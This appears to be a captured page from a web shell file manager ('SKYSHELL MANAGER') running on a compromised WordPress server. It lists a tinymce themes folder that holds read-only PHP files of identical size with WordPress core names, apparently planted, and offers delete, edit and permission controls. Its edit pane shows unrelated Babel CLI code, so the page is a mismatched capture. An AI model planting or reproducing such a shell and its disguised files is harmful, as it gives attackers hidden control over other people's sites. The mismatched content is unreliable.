📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: babel-external-helpers.js
"use strict"; function _commander() { const data = require("commander"); _commander = function () { return data; }; return data; } function _core() { const data = require("@babel/core"); _core = function () { return data; }; return data; } function collect(value, previousValue) { if (typeof value !== "string") return previousValue; const values = value.split(","); if (previousValue) { previousValue.push(...values); return previousValue; } return values; } _commander().option("-l, --whitelist [whitelist]", "Whitelist of helpers to ONLY include", collect); _commander().option("-t, --output-type [type]", "Type of output (global|umd|var)", "global"); _commander().usage("[options]"); _commander().parse(process.argv); console.log((0, _core().buildExternalHelpers)(_commander().whitelist, _commander().outputType)); //# sourceMappingURL=babel-external-helpers.js.map
Save